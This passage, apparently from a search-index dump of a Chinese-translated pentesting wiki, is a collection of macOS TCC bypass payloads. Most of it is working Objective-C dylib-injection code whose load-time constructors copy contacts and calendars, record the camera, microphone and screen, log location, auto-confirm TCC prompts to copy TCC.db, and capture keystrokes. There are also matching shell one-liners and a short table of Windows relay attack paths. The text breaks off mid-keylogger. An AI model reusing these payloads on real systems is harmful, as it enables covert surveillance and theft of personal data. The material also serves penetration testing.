**argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Library/Application 
Support/AddressBook\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/contacts\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Library/Application Support/AddressBook 复制到 /tmp/contacts。 bash cp -r \\"$HOME/Library/Application Support/AddressBook\\" \\"/tmp/contacts\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 联系人","id":"2716","title":"联系人"},"2717":{"body":"权限 : com.apple.security.personal-information.calendars TCC : kTCCServiceCalendar ObjectiveC\\nShell 复制 $HOME/Library/Calendars 到 /tmp/calendars。 objectivec #include \\n#include \\n#include \\n#include \\n#import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager];\\nNSError *error = nil; // Get the path to the user\'s Pictures folder\\nNSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@\\"Library/Calendars/\\"];\\nNSString *tmpPhotosPath = @\\"/tmp/calendars\\"; // Copy the contents recursively\\nif (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) {\\nNSLog(@\\"Error copying items: %@\\", error);\\n} NSLog(@\\"Copy completed successfully.\\", error); fclose(stderr); // Close the file stream\\n} 将 $HOME/Library/Calendars 复制到 /tmp/calendars。 bash cp -r \\"$HOME/Library/Calendars\\" \\"/tmp/calendars\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 日历","id":"2717","title":"日历"},"2718":{"body":"权限 : com.apple.security.device.camera TCC : 
kTCCServiceCamera ObjetiveC - 录制\\nObjectiveC - Check\\nShell 录制一个3秒的视频并将其保存在 /tmp/recording.mov objectivec #import \\n#import // gcc -framework Foundation -framework AVFoundation -dynamiclib CamTest.m -o CamTest.dylib\\n// Code from: https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 @interface VideoRecorder : NSObject \\n@property (strong, nonatomic) AVCaptureSession *captureSession;\\n@property (strong, nonatomic) AVCaptureDeviceInput *videoDeviceInput;\\n@property (strong, nonatomic) AVCaptureMovieFileOutput *movieFileOutput;\\n- (void)startRecording;\\n- (void)stopRecording;\\n@end\\n@implementation VideoRecorder\\n- (instancetype)init {\\nself = [super init];\\nif (self) {\\n[self setupCaptureSession];\\n}\\nreturn self;\\n}\\n- (void)setupCaptureSession {\\nself.captureSession = [[AVCaptureSession alloc] init];\\nself.captureSession.sessionPreset = AVCaptureSessionPresetHigh;\\nAVCaptureDevice *videoDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo];\\nNSError *error;\\nself.videoDeviceInput = [[AVCaptureDeviceInput alloc] initWithDevice:videoDevice error:&error];\\nif (error) {\\nNSLog(@\\"Error setting up video device input: %@\\", [error localizedDescription]);\\nreturn;\\n}\\nif ([self.captureSession canAddInput:self.videoDeviceInput]) {\\n[self.captureSession addInput:self.videoDeviceInput];\\n}\\nself.movieFileOutput = [[AVCaptureMovieFileOutput alloc] init];\\nif ([self.captureSession canAddOutput:self.movieFileOutput]) {\\n[self.captureSession addOutput:self.movieFileOutput];\\n}\\n}\\n- (void)startRecording {\\n[self.captureSession startRunning];\\nNSString *outputFilePath = @\\"/tmp/recording.mov\\";\\nNSURL *outputFileURL = [NSURL fileURLWithPath:outputFilePath];\\n[self.movieFileOutput startRecordingToOutputFileURL:outputFileURL recordingDelegate:self];\\nNSLog(@\\"Recording started\\");\\n}\\n- (void)stopRecording {\\n[self.movieFileOutput 
stopRecording];\\n[self.captureSession stopRunning];\\nNSLog(@\\"Recording stopped\\");\\n}\\n#pragma mark - AVCaptureFileOutputRecordingDelegate\\n- (void)captureOutput:(AVCaptureFileOutput *)captureOutput\\ndidFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL\\nfromConnections:(NSArray *)connections\\nerror:(NSError *)error {\\nif (error) {\\nNSLog(@\\"Recording failed: %@\\", [error localizedDescription]);\\n} else {\\nNSLog(@\\"Recording finished successfully. Saved to %@\\", outputFileURL.path);\\n}\\n}\\n@end\\n__attribute__((constructor))\\nstatic void myconstructor(int argc, const char **argv) {\\nfreopen(\\"/tmp/logs.txt\\", \\"a\\", stderr);\\nVideoRecorder *videoRecorder = [[VideoRecorder alloc] init];\\n[videoRecorder startRecording];\\n[NSThread sleepForTimeInterval:3.0];\\n[videoRecorder stopRecording];\\n[[NSRunLoop currentRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:3.0]];\\nfclose(stderr); // Close the file stream\\n} 检查程序是否有访问相机的权限。 objectivec #import \\n#import // gcc -framework Foundation -framework AVFoundation -dynamiclib CamTest.m -o CamTest.dylib\\n// Code from https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 @interface CameraAccessChecker : NSObject\\n+ (BOOL)hasCameraAccess;\\n@end\\n@implementation CameraAccessChecker\\n+ (BOOL)hasCameraAccess {\\nAVAuthorizationStatus status = [AVCaptureDevice authorizationStatusForMediaType:AVMediaTypeVideo];\\nif (status == AVAuthorizationStatusAuthorized) {\\nNSLog(@\\"[+] Access to camera granted.\\");\\nreturn YES;\\n} else {\\nNSLog(@\\"[-] Access to camera denied.\\");\\nreturn NO;\\n}\\n}\\n@end\\n__attribute__((constructor))\\nstatic void telegram(int argc, const char **argv) {\\nfreopen(\\"/tmp/logs.txt\\", \\"a\\", stderr);\\n[CameraAccessChecker hasCameraAccess];\\nfclose(stderr); // Close the file stream\\n} 用相机拍照 bash ffmpeg -framerate 30 -f avfoundation -i \\"0\\" -frames:v 1 
/tmp/capture.jpg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 摄像头","id":"2718","title":"摄像头"},"2719":{"body":"权限 : com.apple.security.device.audio-input TCC : kTCCServiceMicrophone ObjetiveC - 录音\\nObjectiveC - Check\\nShell 录制 5 秒音频并将其存储在 /tmp/recording.m4a objectivec #import \\n#import // Code from https://www.vicarius.io/vsociety/posts/cve-2023-26818-exploit-macos-tcc-bypass-w-telegram-part-1-2\\n// gcc -dynamiclib -framework Foundation -framework AVFoundation Micexploit.m -o Micexploit.dylib @interface AudioRecorder : NSObject @property (strong, nonatomic) AVCaptureSession *captureSession;\\n@property (strong, nonatomic) AVCaptureDeviceInput *audioDeviceInput;\\n@property (strong, nonatomic) AVCaptureMovieFileOutput *audioFileOutput; - (void)startRecording;\\n- (void)stopRecording; @end @implementation AudioRecorder - (instancetype)init {\\nself = [super init];\\nif (self) {\\n[self setupCaptureSession];\\n}\\nreturn self;\\n} - (void)setupCaptureSession {\\nself.captureSession = [[AVCaptureSession alloc] init];\\nself.captureSession.sessionPreset = AVCaptureSessionPresetHigh; AVCaptureDevice *audioDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeAudio];\\nNSError *error;\\nself.audioDeviceInput = [[AVCaptureDeviceInput alloc] initWithDevice:audioDevice error:&error]; if (error) {\\nNSLog(@\\"Error setting up audio device input: %@\\", [error localizedDescription]);\\nreturn;\\n} if ([self.captureSession canAddInput:self.audioDeviceInput]) {\\n[self.captureSession addInput:self.audioDeviceInput];\\n} self.audioFileOutput = [[AVCaptureMovieFileOutput alloc] init]; if ([self.captureSession canAddOutput:self.audioFileOutput]) {\\n[self.captureSession addOutput:self.audioFileOutput];\\n}\\n} - (void)startRecording {\\n[self.captureSession startRunning];\\nNSString *outputFilePath = [NSTemporaryDirectory() stringByAppendingPathComponent:@\\"recording.m4a\\"];\\nNSURL 
*outputFileURL = [NSURL fileURLWithPath:outputFilePath];\\n[self.audioFileOutput startRecordingToOutputFileURL:outputFileURL recordingDelegate:self];\\nNSLog(@\\"Recording started\\");\\n} - (void)stopRecording {\\n[self.audioFileOutput stopRecording];\\n[self.captureSession stopRunning];\\nNSLog(@\\"Recording stopped\\");\\n} #pragma mark - AVCaptureFileOutputRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)captureOutput\\ndidFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL\\nfromConnections:(NSArray *)connections\\nerror:(NSError *)error {\\nif (error) {\\nNSLog(@\\"Recording failed: %@\\", [error localizedDescription]);\\n} else {\\nNSLog(@\\"Recording finished successfully. Saved to %@\\", outputFileURL.path);\\n}\\nNSLog(@\\"Saved to %@\\", outputFileURL.path);\\n} @end __attribute__((constructor))\\nstatic void myconstructor(int argc, const char **argv) { freopen(\\"/tmp/logs.txt\\", \\"a\\", stderr);\\nAudioRecorder *audioRecorder = [[AudioRecorder alloc] init]; [audioRecorder startRecording];\\n[NSThread sleepForTimeInterval:5.0];\\n[audioRecorder stopRecording]; [[NSRunLoop currentRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:1.0]];\\nfclose(stderr); // Close the file stream\\n} 检查应用是否有权访问麦克风。 objectivec #import \\n#import // From https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4\\n// gcc -framework Foundation -framework AVFoundation -dynamiclib MicTest.m -o MicTest.dylib @interface MicrophoneAccessChecker : NSObject\\n+ (BOOL)hasMicrophoneAccess;\\n@end\\n@implementation MicrophoneAccessChecker\\n+ (BOOL)hasMicrophoneAccess {\\nAVAuthorizationStatus status = [AVCaptureDevice authorizationStatusForMediaType:AVMediaTypeAudio];\\nif (status == AVAuthorizationStatusAuthorized) {\\nNSLog(@\\"[+] Access to microphone granted.\\");\\nreturn YES;\\n} else {\\nNSLog(@\\"[-] Access to microphone denied.\\");\\nreturn 
NO;\\n}\\n}\\n@end\\n__attribute__((constructor))\\nstatic void telegram(int argc, const char **argv) {\\n[MicrophoneAccessChecker hasMicrophoneAccess];\\n} 录制5秒音频并将其存储在/tmp/recording.wav bash # Check the microphones\\nffmpeg -f avfoundation -list_devices true -i \\"\\"\\n# Use microphone from index 1 from the previous list to record\\nffmpeg -f avfoundation -i \\":1\\" -t 5 /tmp/recording.wav","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 麦克风","id":"2719","title":"麦克风"},"272":{"body":"向量 技巧 重要性 AuthIP / IPSec 假服务器发送带有任意 SPN 的 GSS-ID 负载 ;客户端直接向您构建 AP-REQ 即使跨子网也有效;默认情况下机器凭据 DCOM / MSRPC 恶意 OXID 解析器强制客户端对任意 SPN 和端口进行身份验证 纯 本地 权限提升;绕过防火墙 AD CS Web Enroll 将机器票据中继到 HTTP/CA 并获取证书,然后 PKINIT 生成 TGT 绕过 LDAP 签名防御 Shadow Credentials 写入 msDS-KeyCredentialLink,然后使用伪造的密钥对进行 PKINIT 无需添加计算机帐户","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 值得了解的更多路径","id":"272","title":"值得了解的更多路径"},"2720":{"body":"tip 要让应用获取位置, 位置服务 (来自隐私与安全) 必须启用, 否则将无法访问。 权限 : com.apple.security.personal-information.location TCC : 在 /var/db/locationd/clients.plist 中授予 ObjectiveC\\nShell 将位置写入 /tmp/logs.txt objectivec #include \\n#include \\n#import \\n#import @interface LocationManagerDelegate : NSObject \\n@end @implementation LocationManagerDelegate - (void)locationManager:(CLLocationManager *)manager didUpdateLocations:(NSArray *)locations {\\nCLLocation *location = [locations lastObject];\\nNSLog(@\\"Current location: %@\\", location);\\nexit(0); // Exit the program after receiving the first location update\\n} - (void)locationManager:(CLLocationManager *)manager didFailWithError:(NSError *)error {\\nNSLog(@\\"Error getting location: %@\\", error);\\nexit(1); // Exit the program on error\\n} @end __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\n{\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt NSLog(@\\"Getting 
location\\");\\nCLLocationManager *locationManager = [[CLLocationManager alloc] init];\\nLocationManagerDelegate *delegate = [[LocationManagerDelegate alloc] init];\\nlocationManager.delegate = delegate; [locationManager requestWhenInUseAuthorization]; // or use requestAlwaysAuthorization\\n[locationManager startUpdatingLocation]; NSRunLoop *runLoop = [NSRunLoop currentRunLoop];\\nwhile (true) {\\n[runLoop runUntilDate:[NSDate dateWithTimeIntervalSinceNow:1.0]];\\n} NSLog(@\\"Location completed successfully.\\");\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt\\n} 获取对该位置的访问权限 ???","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 位置","id":"2720","title":"位置"},"2721":{"body":"权限 : 无 TCC : kTCCServiceScreenCapture ObjectiveC\\nShell 在/tmp/screen.mov中录制主屏幕5秒 objectivec #import \\n#import // clang -framework Foundation -framework AVFoundation -framework CoreVideo -framework CoreMedia -framework CoreGraphics -o ScreenCapture ScreenCapture.m @interface MyRecordingDelegate : NSObject \\n@end @implementation MyRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)output\\ndidFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL\\nfromConnections:(NSArray *)connections\\nerror:(NSError *)error {\\nif (error) {\\nNSLog(@\\"Recording error: %@\\", error);\\n} else {\\nNSLog(@\\"Recording finished successfully.\\");\\n}\\nexit(0);\\n} @end __attribute__((constructor))\\nvoid myconstructor(int argc, const char **argv)\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt\\nAVCaptureSession *captureSession = [[AVCaptureSession alloc] init];\\nAVCaptureScreenInput *screenInput = [[AVCaptureScreenInput alloc] initWithDisplayID:CGMainDisplayID()];\\nif ([captureSession canAddInput:screenInput]) {\\n[captureSession addInput:screenInput];\\n} AVCaptureMovieFileOutput *fileOutput = [[AVCaptureMovieFileOutput alloc] init];\\nif 
([captureSession canAddOutput:fileOutput]) {\\n[captureSession addOutput:fileOutput];\\n} [captureSession startRunning]; MyRecordingDelegate *delegate = [[MyRecordingDelegate alloc] init];\\n[fileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@\\"/tmp/screen.mov\\"] recordingDelegate:delegate]; // Run the loop for 5 seconds to capture\\ndispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(5 * NSEC_PER_SEC)), dispatch_get_main_queue(), ^{\\n[fileOutput stopRecording];\\n}); CFRunLoopRun();\\nfreopen(\\"/tmp/logs.txt\\", \\"w\\", stderr); // Redirect stderr to /tmp/logs.txt\\n} 记录主屏幕5秒钟 bash screencapture -V 5 /tmp/screen.mov","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS TCC » macOS TCC Payloads » 屏幕录制","id":"2721","title":"屏幕录制"},"2722":{"body":"权限 : 无 TCC : kTCCServiceAccessibility 使用 TCC 权限接受 Finder 的控制,按下回车并以此绕过 TCC 接受 TCC\\nKeylogger objectivec #import \\n#import \\n#import // clang -framework Foundation -framework ApplicationServices -framework OSAKit -o ParallelScript ParallelScript.m\\n// TODO: Improve to monitor the foreground app and press enter when TCC appears void SimulateKeyPress(CGKeyCode keyCode) {\\nCGEventRef keyDownEvent = CGEventCreateKeyboardEvent(NULL, keyCode, true);\\nCGEventRef keyUpEvent = CGEventCreateKeyboardEvent(NULL, keyCode, false);\\nCGEventPost(kCGHIDEventTap, keyDownEvent);\\nCGEventPost(kCGHIDEventTap, keyUpEvent);\\nif (keyDownEvent) CFRelease(keyDownEvent);\\nif (keyUpEvent) CFRelease(keyUpEvent);\\n} void RunAppleScript() {\\nNSLog(@\\"Starting AppleScript\\");\\nNSString *scriptSource = @\\"tell application \\\\\\"Finder\\\\\\"\\\\n\\"\\n\\"set sourceFile to POSIX file \\\\\\"/Library/Application Support/com.apple.TCC/TCC.db\\\\\\" as alias\\\\n\\"\\n\\"set targetFolder to POSIX file \\\\\\"/tmp\\\\\\" as alias\\\\n\\"\\n\\"duplicate file sourceFile to targetFolder with replacing\\\\n\\"\\n\\"end tell\\\\n\\"; NSDictionary *errorDict = nil;\\nNSAppleScript 
*appleScript = [[NSAppleScript alloc] initWithSource:scriptSource];\\n[appleScript executeAndReturnError:&errorDict]; if (errorDict) {\\nNSLog(@\\"AppleScript Error: %@\\", errorDict);\\n}\\n} int main() {\\n@autoreleasepool {\\ndispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{\\nRunAppleScript();\\n}); // Simulate pressing the Enter key every 0.1 seconds\\nNSLog(@\\"Starting key presses\\");\\nfor (int i = 0; i < 10; ++i) {\\nSimulateKeyPress((CGKeyCode)36); // Key code for Enter\\nusleep(100000); // 0.1 seconds\\n}\\n}\\nreturn 0;\\n} 将按下的键存储在 /tmp/keystrokes.txt objectivec #import \\n#import \\n#import // clang -framework Foundation -framework ApplicationServices -framework Carbon -o KeyboardMonitor KeyboardMonitor.m NSString *const kKeystrokesLogPath = @\\"/tmp/keystrokes.txt\\"; void AppendStringToFile(NSString *str, NSString *filePath) {\\nNSFileHandle *fileHandle = [NSFileHandle fileHandleForWritingAtPath:filePath];\\nif (fileHandle) {\\n[fileHandle seekToEndOfFile];\\n[fileHandle writeData:[str dataUsingEncoding:NSUTF8StringEncoding]];\\n[fileHandle closeFile];\\n} else {\\n// If the file does not exist, create it\\n[str writeToFile:filePath atomically:YES encoding:NSUTF8StringEncoding error:nil];\\n}\\n} CGEventRef KeyboardEventCallback(CGEventTapProxy proxy, CGEventType type, CGEventRef event, void *refcon) {\\nif (type == kCGEventKeyDown) {\\nCGKeyCode keyCode = (CGKeyCode)CGEventGetIntegerValueField(event, kCGKeyboardEventKeycode); NSString *keyString = nil;\\n// First, handle special non-printable keys\\nswitch (keyCode) {\\ncase kVK_Return: keyString = @\\"\\"; break;\\ncase kVK_Tab: keyString = @\\"\\"; break;\\ncase kVK_Space: keyString = @\\"\\"; break;\\ncase kVK_Delete: keyString = @\\"\\"; break;\\ncase kVK_Escape: keyString = @\\"\\"; break;\\ncase kVK_Command: keyString = @\\"\\"; break;\\ncase kVK_Shift: keyString = @\\"\\"; break;\\ncase kVK_CapsLock: keyString = @\\"\\"; break;\\ncase kVK_Option: keyString = 
@\\"